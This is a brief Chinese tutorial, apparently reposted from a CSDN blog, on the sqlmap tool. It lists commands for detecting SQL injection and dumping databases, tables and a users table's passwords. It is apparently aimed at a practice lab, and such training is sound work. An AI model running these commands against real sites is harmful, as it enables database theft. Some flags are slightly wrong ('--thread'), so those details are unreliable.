1.21 SQLmap工具使用
作者:互联网
设置sqlmap线程(扫描速率,范围1-10) --thread
kali端
1.判断网站是否存在注入
get类型sqlmap -u "url">检测url中是否存在注入点,如果没有注入点则运行不出来
post类型sqlmap -r 请求数据包.txt> 使用抓到的数据包文本进行检测注入
2.爆出数据库
爆出当前数据库sqlmap -u "url" --current-db --thread 10 >使用10线程
爆出网站内所有数据库sqlmap -u "url" --dbs --thread 10
3.爆出表
指出security数据库名-D security爆出所有的表--tables
爆出security数据库中所有表的数据
sqlmap -u "url" -D security --tables--dump>撞库
爆出security数据库中所有数据
sqlmap -u "url" --dump-all>脱库
4.爆出列
sqlmap -u " url" -D security -T users --columns>爆出指定数据库下面指定表的所有列
5.爆出列中所有字段内容
爆出-C指定列的内容
sqlmap -u "url" -D security -T users -C id,password,username --dump
标签:SQLmap,sqlmap,security,--,爆出,数据库,url,1.21,工具 来源: https://blog.csdn.net/qq_52471916/article/details/122848580